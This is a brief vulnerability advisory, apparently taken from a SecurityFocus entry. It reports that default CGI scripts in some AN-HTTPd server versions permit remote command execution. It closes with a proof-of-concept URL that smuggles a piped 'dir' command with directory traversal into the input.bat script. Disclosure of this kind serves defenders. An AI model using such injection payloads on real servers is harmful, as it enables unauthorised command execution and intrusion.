5 lines
No EOL
278 B
Text
5 lines
No EOL
278 B
Text
source: http://www.securityfocus.com/bid/762/info
|
|
|
|
Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data.
|
|
|
|
http://www.xxx.yy/cgi-bin/input.bat?|dir..\..\windows |